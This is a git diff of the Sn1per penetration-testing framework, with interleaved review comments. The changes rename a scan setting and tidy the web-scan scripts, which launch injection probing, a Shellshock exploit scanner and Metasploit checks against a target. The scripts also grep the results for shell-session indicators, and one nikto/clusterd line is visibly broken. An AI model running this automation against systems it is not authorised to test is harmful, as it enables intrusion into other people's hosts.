diff --git a/CHANGELOG.md b/CHANGELOG.md index ab0b5aff..0934baf4 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -1,4 +1,6 @@ ## CHANGELOG: +* v9.0 - Added Fortinet FortiGate SSL VPN Panel Detected sc0pe template +* v9.0 - Added CVE-2020-17519 - Apache Flink Path Traversal sc0pe template * v9.0 - Added RabbitMQ Management Interface Detected sc0pe template * v9.0 - Added CVE-2020-29583 Zyxel SSH Hardcoded Credentials via BruteX * v9.0 - Removed vulnscan NMap CSV updates/downloads to save space/bandwidth @@ -7,6 +9,7 @@ * v9.0 - Added Wordpress WPScan sc0pe vulnerability parser * v9.0 - Fixed issue with wrong WPscan API key command * v9.0 - Added CVE-2020-11738 - WordPress Duplicator plugin Directory Traversal sc0pe template +* v9.0 - Renamed AUTO_VULNSCAN setting to "VULNSCAN" in sniper.conf to perform vulnerability scans via 'normal' mode * v8.9 - Tuned sniper.conf around performance for all scans and recon modes * v8.9 - Added out of scope options to config * v8.9 - Added automatic HTTP/HTTPS web scans and vulnerability scans to 'normal' mode diff --git a/README.md b/README.md index 01329dba..8b6dbe38 100644 --- a/README.md +++ b/README.md @@ -129,7 +129,7 @@ sniper -c /path/to/sniper.conf -t -w sniper -u|--update ``` -## MODES: +## MODES * **NORMAL:** Performs basic scan of targets and open ports using both active and passive checks for optimal performance. * **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking. * **FLYOVER:** Fast multi-threaded high level scans of multiple targets (useful for collecting high level data on many hosts quickly). diff --git a/modes/normal.sh b/modes/normal.sh index bda2313e..600bb79c 100644 --- a/modes/normal.sh +++ b/modes/normal.sh 
@@ -1201,9 +1201,9 @@ else fi fi -if [[ "$AUTO_VULNSCAN" = "1" ]]; then +if [[ "$VULNSCAN" = "1" ]]; then echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - echo -e "$OKRED PERFORMING AUTO VULNSCAN $RESET" + echo -e "$OKRED PERFORMING VULNERABILITYSCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" sniper -t $TARGET -m vulnscan -w $WORKSPACE fi diff --git a/modes/normal_webporthttp.sh b/modes/normal_webporthttp.sh index 6872f396..868a8611 100644 --- a/modes/normal_webporthttp.sh +++ b/modes/normal_webporthttp.sh 
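Review bot: The new test `if [[ "$VULNSCAN" = "1" ]]; then` reads a variable that an existing sniper.conf still sets under its old name, so anyone who had `AUTO_VULNSCAN="1"` silently loses the vulnerability scan after upgrading; the sniper.conf hunk in this commit only changes the shipped default. A fallback line before the test keeps old configs working: `VULNSCAN="${VULNSCAN:-${AUTO_VULNSCAN:-0}}"`. The `sniper -t $TARGET -m vulnscan -w $WORKSPACE` invocation should also quote its expansions, `sniper -t "$TARGET" -m vulnscan -w "$WORKSPACE"`, and the new banner `PERFORMING VULNERABILITYSCAN` is missing the space between the two words. The `else`/`fi` context at the top of the hunk closes a block that starts outside it.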
@@ -59,9 +59,10 @@ wpif [[ "$MODE" = "web" ]]; then fi fi if [[ "$INJECTX" == "1" ]]; then - rm -f $LOOT_DIR/web/injectx-$TARGET-http.txt 2> /dev/null + rm -f $LOOT_DIR/web/injectx-$TARGET-http.raw 2> /dev/null #cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep 'http\:' | xargs -P $THREADS -r -n 1 -I '{}' injectx.py -u '{}' -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-http.txt - for a in `cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep "http\:" | cut -d '?' -f2 | cut -d '=' -f1 | sort -u`; do for b in `grep $a $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "http\:" | head -n 1`; do injectx.py -u $b -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-http.txt; done; done; + for a in `cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep "http\:" | cut -d '?' -f2 | cut -d '=' -f1 | sort -u`; do for b in `grep $a $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "http\:" | head -n 1`; do injectx.py -u $b -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-http.raw; done; done; + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/injectx-$TARGET-http.raw 2> /dev/null > $LOOT_DIR/web/injectx-$TARGET-http.txt fi source $INSTALL_DIR/modes/static-grep-search.sh if [[ "$WEB_JAVASCRIPT_ANALYSIS" == "1" ]]; then diff --git a/modes/normal_webporthttps.sh b/modes/normal_webporthttps.sh index ff675024..928dc5b5 100644 --- a/modes/normal_webporthttps.sh +++ b/modes/normal_webporthttps.sh 
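Review bot: The new `injectx-$TARGET-http.raw` intermediate is left on disk after the `sed` strips its colour codes into the `.txt`, whereas the wpscan and jexboss blocks elsewhere in this commit `rm -f` their `.raw` once converted; add `rm -f $LOOT_DIR/web/injectx-$TARGET-http.raw 2> /dev/null` after the sed. The inner `grep $a` also passes a query-parameter name taken from the spider output as an unquoted regex, so a name containing regex metacharacters or a leading `-` changes what is matched; `grep -F -- "$a"` matches it literally. The same two points apply to the INJECTX hunks in normal_webporthttps.sh and webporthttp.sh below. The enclosing block (the `if [[ "$MODE" = "web" ]]` shown in the hunk trailer) starts and ends outside the hunk.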
@@ -57,8 +57,9 @@ if [[ "$MODE" = "web" ]]; then fi fi if [[ "$INJECTX" == "1" ]]; then - rm -f $LOOT_DIR/web/injectx-$TARGET-https.txt 2> /dev/null - for a in `cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep "https\:" | cut -d '?' -f2 | cut -d '=' -f1 | sort -u`; do for b in `grep $a $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "https\:" | head -n 1`; do injectx.py -u $b -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-https.txt; done; done; + rm -f $LOOT_DIR/web/injectx-$TARGET-https.raw 2> /dev/null + for a in `cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep "https\:" | cut -d '?' -f2 | cut -d '=' -f1 | sort -u`; do for b in `grep $a $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "https\:" | head -n 1`; do injectx.py -u $b -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-https.raw; done; done; + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/injectx-$TARGET-https.raw 2> /dev/null > $LOOT_DIR/web/injectx-$TARGET-https.txt fi source $INSTALL_DIR/modes/static-grep-search.sh if [[ "$WEB_JAVASCRIPT_ANALYSIS" == "1" ]]; then diff --git a/modes/webporthttp.sh b/modes/webporthttp.sh index cdda0357..9ea4b8ea 100644 --- a/modes/webporthttp.sh +++ b/modes/webporthttp.sh 
@@ -212,9 +212,10 @@ if [[ "$MODE" = "webporthttp" ]]; then fi fi if [[ "$INJECTX" == "1" ]]; then - rm -f $LOOT_DIR/web/injectx-$TARGET-http.txt 2> /dev/null + rm -f $LOOT_DIR/web/injectx-$TARGET-http-${PORT}.raw 2> /dev/null #cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep 'http\:' | xargs -P $THREADS -r -n 1 -I '{}' injectx.py -u '{}' -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-http.txt - for a in `cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep "http\:" | cut -d '?' -f2 | cut -d '=' -f1 | sort -u`; do for b in `grep $a $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "http\:" | head -n 1`; do injectx.py -u $b -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-http.txt; done; done; + for a in `cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep "http\:" | cut -d '?' -f2 | cut -d '=' -f1 | sort -u`; do for b in `grep $a $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "http\:" | head -n 1`; do injectx.py -u $b -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-http-${PORT}.raw; done; done; + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/injectx-$TARGET-http-${PORT}.raw 2> /dev/null > $LOOT_DIR/web/injectx-$TARGET-http-${PORT}.txt fi source $INSTALL_DIR/modes/static-grep-search.sh if [[ "$WEB_JAVASCRIPT_ANALYSIS" == "1" ]]; then 
@@ -272,20 +273,20 @@ if [[ "$MODE" = "webporthttp" ]]; then if [[ "$GOBUSTER" == "1" ]]; then sort -u $LOOT_DIR/web/webbrute-$TARGET-*.txt 2> /dev/null > $LOOT_DIR/web/webbrute-$TARGET.txt 2> /dev/null fi - wget --connect-timeout=5 --read-timeout=10 --tries=1 http://$TARGET:$PORT/robots.txt -O $LOOT_DIR/web/robots-$TARGET:$PORT-http.txt 2> /dev/null + wget --connect-timeout=5 --read-timeout=10 --tries=1 http://$TARGET:${PORT}/robots.txt -O $LOOT_DIR/web/robots-$TARGET:${PORT}-http.txt 2> /dev/null if [[ "$CLUSTERD" == "1" ]]; then echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET" echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - clusterd -i $TARGET -p $PORT | tee $LOOT_DIR/web/clusterd-$TARGET-port$PORT.txt + clusterd -i $TARGET -p ${PORT} | tee $LOOT_DIR/web/clusterd-$TARGET-port${PORT}.txt fi if [[ "$CMSMAP" == "1" ]]; then echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" echo -e "$OKRED RUNNING CMSMAP $RESET" echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - cmsmap http://$TARGET:$PORT | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port$PORTa.txt + cmsmap http://$TARGET:${PORT} | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port${PORT}a.txt echo "" - cmsmap http://$TARGET/wordpress/ | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port$PORTb.txt + cmsmap http://$TARGET/wordpress/ | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port${PORT}b.txt echo "" fi if [[ "$WPSCAN" == "1" ]]; then 
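Review bot: The second cmsmap call, `cmsmap http://$TARGET/wordpress/ | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port${PORT}b.txt`, still scans the default port while its output file is named for `${PORT}`; the https counterpart in this commit uses `https://$TARGET:${PORT}/wordpress/`. Change it to `cmsmap http://$TARGET:${PORT}/wordpress/ | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port${PORT}b.txt`. The `${PORT}` bracing itself is a real fix, since `$PORTa` and `$PORTb` expanded a non-existent variable and both outputs landed in the same file. The enclosing `if [[ "$MODE" = "webporthttp" ]]` block starts and ends outside the hunk.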
@@ -293,60 +294,60 @@ if [[ "$MODE" = "webporthttp" ]]; then echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" if [[ "$WP_API_KEY" ]]; then - wpscan --url http://$TARGET:$PORT --no-update --disable-tls-checks --api-token $WP_API_KEY 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port$PORTa.raw + wpscan --url http://$TARGET:${PORT} --no-update --disable-tls-checks --api-token $WP_API_KEY 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port${PORT}a.raw echo "" - wpscan --url http://$TARGET:$PORT/wordpress/ --no-update --disable-tls-checks --api-token $WP_API_KEY 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port$PORTb.raw + wpscan --url http://$TARGET:${PORT}/wordpress/ --no-update --disable-tls-checks --api-token $WP_API_KEY 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port${PORT}b.raw echo "" else - wpscan --url http://$TARGET:$PORT --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port$PORTa.raw + wpscan --url http://$TARGET:${PORT} --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port${PORT}a.raw echo "" - wpscan --url http://$TARGET:$PORT/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port$PORTb.raw + wpscan --url http://$TARGET:${PORT}/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port${PORT}b.raw fi - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wpscan-$TARGET-http-port$PORTa.raw 2> /dev/null > $LOOT_DIR/web/wpscan-$TARGET-http-port$PORTa.txt - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wpscan-$TARGET-http-port$PORTb.raw 2> /dev/null > $LOOT_DIR/web/wpscan-$TARGET-http-port$PORTb.txt + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" 
$LOOT_DIR/web/wpscan-$TARGET-http-port${PORT}a.raw 2> /dev/null > $LOOT_DIR/web/wpscan-$TARGET-http-port${PORT}a.txt + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wpscan-$TARGET-http-port${PORT}b.raw 2> /dev/null > $LOOT_DIR/web/wpscan-$TARGET-http-port${PORT}b.txt rm -f $LOOT_DIR/web/wpscan-$TARGET-http*.raw 2> /dev/null fi if [[ "$NIKTO" == "1" ]]; then echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - nikto -h http://$TARGET:$PORT -output $LOOT_DIR/web/nikto-$TARGET-http-port$PORT.txt - sed -ir "s/ /dev/null | tee $LOOT_DIR/web/clusterd-$TARGET-http-port$PORT.txt + clusterd -i $TARGET -p ${PORT} 2> /dev/null | tee $LOOT_DIR/web/clusterd-$TARGET-http-port${PORT}.txt fi if [[ "$SHOCKER" == "1" ]]; then echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port $PORT | tee $LOOT_DIR/web/shocker-$TARGET-port$PORT.txt + python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port ${PORT} | tee $LOOT_DIR/web/shocker-$TARGET-port${PORT}.txt fi if [[ "$JEXBOSS" == "1" ]]; then echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" echo -e "$OKRED RUNNING 
JEXBOSS $RESET" echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" cd /tmp/ - python /usr/share/sniper/plugins/jexboss/jexboss.py -u http://$TARGET:$PORT | tee $LOOT_DIR/web/jexboss-$TARGET-port$PORT.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/jexboss-$TARGET-port$PORT.raw > $LOOT_DIR/web/jexboss-$TARGET-port$PORT.txt 2> /dev/null - rm -f $LOOT_DIR/web/jexboss-$TARGET-port$PORT.raw 2> /dev/null + python /usr/share/sniper/plugins/jexboss/jexboss.py -u http://$TARGET:${PORT} | tee $LOOT_DIR/web/jexboss-$TARGET-port${PORT}.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/jexboss-$TARGET-port${PORT}.raw > $LOOT_DIR/web/jexboss-$TARGET-port${PORT}.txt 2> /dev/null + rm -f $LOOT_DIR/web/jexboss-$TARGET-port${PORT}.raw 2> /dev/null cd $INSTALL_DIR fi if [[ "$SMUGGLER" = "1" ]]; then echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" echo -e "$OKRED RUNNING HTTP REQUEST SMUGGLING DETECTION $RESET" echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - python3 /usr/share/sniper/plugins/smuggler/smuggler.py --no-color -u http://$TARGET:$PORT | tee $LOOT_DIR/web/smuggler-$TARGET-port${PORT}.txt + python3 /usr/share/sniper/plugins/smuggler/smuggler.py --no-color -u http://$TARGET:${PORT} | tee $LOOT_DIR/web/smuggler-$TARGET-port${PORT}.txt fi if [[ "$NUCLEI" = "1" ]]; then echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" echo -e "$OKRED RUNNING NUCLEI SCAN $RESET" echo -e 
"${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - nuclei -silent -t /usr/share/sniper/plugins/nuclei-templates/ -c $THREADS -target http://$TARGET:$PORT -o $LOOT_DIR/web/nuclei-http-${TARGET}-port${PORT}.txt + nuclei -silent -t /usr/share/sniper/plugins/nuclei-templates/ -c $THREADS -target http://$TARGET:${PORT} -o $LOOT_DIR/web/nuclei-http-${TARGET}-port${PORT}.txt fi SSL="false" source $INSTALL_DIR/modes/web_autopwn.sh 
@@ -378,79 +379,79 @@ if [[ "$MODE" = "webporthttp" ]]; then curl -s "http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a" | jq '.issue_events[].issue | "[" + .severity + "] " + .name + " - " + .origin + .path' | sort -u | sed 's/\"//g' | tee $LOOT_DIR/web/burpsuite-$TARGET-$a.txt done echo "[-] Done!" - fi + fi - if [[ "$ZAP_SCAN" == "1" ]]; then - echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - echo -e "$OKRED RUNNING OWASP ZAP SCAN $RESET" + if [[ "$ZAP_SCAN" == "1" ]]; then echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - echo "[i] Scanning: http://$TARGET:$PORT/" - sudo python3 /usr/share/sniper/bin/zap-scan.py "http://$TARGET:$PORT/" - DATE=$(date +"%Y%m%d%H%M") - sudo grep "'" /usr/share/sniper/bin/zap-report.txt | cut -d\' -f2 | cut -d\\ -f1 > $LOOT_DIR/web/zap-report-$TARGET-http-$DATE.html - cp -f $LOOT_DIR/web/zap-report-$TARGET-http-$DATE.html $LOOT_DIR/web/zap-report-$TARGET-http.html 2> /dev/null - echo "[i] Scan complete." 
- echo "[+] Report saved to: $LOOT_DIR/web/zap-report-$TARGET-http-$DATE.html" - fi - - if [[ "$ARACHNI_SCAN" == "1" ]]; then - echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - echo -e "$OKRED RUNNING ARACHNI SCAN $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - DATE=$(date +"%Y%m%d%H%M") - mkdir -p $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/ - arachni --report-save-path=$LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/ --output-only-positives http://$TARGET:$PORT | tee ${LOOT_DIR}/web/arachni_webscan_${TARGET}_${PORT}_${DATE}.txt + echo -e "$OKRED RUNNING OWASP ZAP SCAN $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + echo "[i] Scanning: http://$TARGET:$PORT/" + sudo python3 /usr/share/sniper/bin/zap-scan.py "http://$TARGET:$PORT/" + DATE=$(date +"%Y%m%d%H%M") + sudo grep "'" /usr/share/sniper/bin/zap-report.txt | cut -d\' -f2 | cut -d\\ -f1 > $LOOT_DIR/web/zap-report-$TARGET-http-$DATE.html + cp -f $LOOT_DIR/web/zap-report-$TARGET-http-$DATE.html $LOOT_DIR/web/zap-report-$TARGET-http.html 2> /dev/null + echo "[i] Scan complete." 
+ echo "[+] Report saved to: $LOOT_DIR/web/zap-report-$TARGET-http-$DATE.html" + fi - cd $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/ - arachni_reporter $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/*.afr --report=html:outfile=$LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/arachni.zip - cd $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/ - unzip arachni.zip - cd $INSTALL_DIR - fi + if [[ "$ARACHNI_SCAN" == "1" ]]; then + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + echo -e "$OKRED RUNNING ARACHNI SCAN $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + DATE=$(date +"%Y%m%d%H%M") + mkdir -p $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/ + arachni --report-save-path=$LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/ --output-only-positives http://$TARGET:$PORT | tee ${LOOT_DIR}/web/arachni_webscan_${TARGET}_${PORT}_${DATE}.txt - if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then - echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - echo -e "$OKRED RUNNING SC0PE WEB VULNERABILITY SCAN $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - SSL="false" - source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh - source $INSTALL_DIR/modes/sc0pe-active-webscan.sh - for file in `ls $INSTALL_DIR/templates/passive/web/recursive/*.sh 2> /dev/null`; do - source $file - done - source $INSTALL_DIR/modes/sc0pe-network-scan.sh - echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - fi - - source 
$INSTALL_DIR/modes/sc0pe.sh + cd $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/ + arachni_reporter $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/*.afr --report=html:outfile=$LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/arachni.zip + cd $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/ + unzip arachni.zip cd $INSTALL_DIR + fi + if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - echo -e "$OKRED SCAN COMPLETE! $RESET" + echo -e "$OKRED RUNNING SC0PE WEB VULNERABILITY SCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - echo "$TARGET" >> $LOOT_DIR/scans/updated.txt - rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null - ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt - rm -f $INSTALL_DIR/.fuse_* 2> /dev/null - VULNERABLE_METASPLOIT=$(egrep -h -i -s "may be vulnerable|is vulnerable|IKE response with leak|File saved in" $LOOT_DIR/output/msf-$TARGET-*.txt 2> /dev/null) - if [[ ${#VULNERABLE_METASPLOIT} -ge 5 ]]; then - echo "$VULNERABLE_METASPLOIT" > $LOOT_DIR/output/vulnerable-metasploit-$TARGET.txt 2> /dev/null - fi - VULNERABLE_SHELLSHOCK=$(egrep -h -i -s "The following URLs appear to be exploitable:" $LOOT_DIR/web/shocker-$TARGET-*.txt 2> /dev/null) - if [[ ${#VULNERABLE_SHELLSHOCK} -ge 5 ]]; then - echo "$VULNERABLE_SHELLSHOCK" > $LOOT_DIR/output/vulnerable-shellshock-$TARGET.txt 2> /dev/null - fi - SHELLED=$(egrep -h -i -s "Meterpreter session|Command executed|File(s) found:|Command Stager progress|File uploaded|Command shell session" $LOOT_DIR/output/msf-$TARGET-*.txt 2> /dev/null) - if [[ ${#SHELLED} -ge 5 ]]; then - echo "$SHELLED" > $LOOT_DIR/output/shelled-$TARGET.txt 2> /dev/null - fi - - echo 
"[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: http://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt - if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then - /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: http://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" - fi - if [[ "$LOOT" = "1" ]]; then - loot - fi - exit - fi \ No newline at end of file + SSL="false" + source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh + source $INSTALL_DIR/modes/sc0pe-active-webscan.sh + for file in `ls $INSTALL_DIR/templates/passive/web/recursive/*.sh 2> /dev/null`; do + source $file + done + source $INSTALL_DIR/modes/sc0pe-network-scan.sh + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + fi + + source $INSTALL_DIR/modes/sc0pe.sh + cd $INSTALL_DIR + + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + echo -e "$OKRED SCAN COMPLETE! 
$RESET" + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + echo "$TARGET" >> $LOOT_DIR/scans/updated.txt + rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null + ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt + rm -f $INSTALL_DIR/.fuse_* 2> /dev/null + VULNERABLE_METASPLOIT=$(egrep -h -i -s "may be vulnerable|is vulnerable|IKE response with leak|File saved in" $LOOT_DIR/output/msf-$TARGET-*.txt 2> /dev/null) + if [[ ${#VULNERABLE_METASPLOIT} -ge 5 ]]; then + echo "$VULNERABLE_METASPLOIT" > $LOOT_DIR/output/vulnerable-metasploit-$TARGET.txt 2> /dev/null + fi + VULNERABLE_SHELLSHOCK=$(egrep -h -i -s "The following URLs appear to be exploitable:" $LOOT_DIR/web/shocker-$TARGET-*.txt 2> /dev/null) + if [[ ${#VULNERABLE_SHELLSHOCK} -ge 5 ]]; then + echo "$VULNERABLE_SHELLSHOCK" > $LOOT_DIR/output/vulnerable-shellshock-$TARGET.txt 2> /dev/null + fi + SHELLED=$(egrep -h -i -s "Meterpreter session|Command executed|File(s) found:|Command Stager progress|File uploaded|Command shell session" $LOOT_DIR/output/msf-$TARGET-*.txt 2> /dev/null) + if [[ ${#SHELLED} -ge 5 ]]; then + echo "$SHELLED" > $LOOT_DIR/output/shelled-$TARGET.txt 2> /dev/null + fi + + echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: http://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt + if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: http://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" + fi + if [[ "$LOOT" = "1" ]]; then + loot + fi + exit +fi \ No newline at end of file diff --git a/modes/webporthttps.sh b/modes/webporthttps.sh index a0bc576d..4d28d692 100644 --- a/modes/webporthttps.sh +++ b/modes/webporthttps.sh 
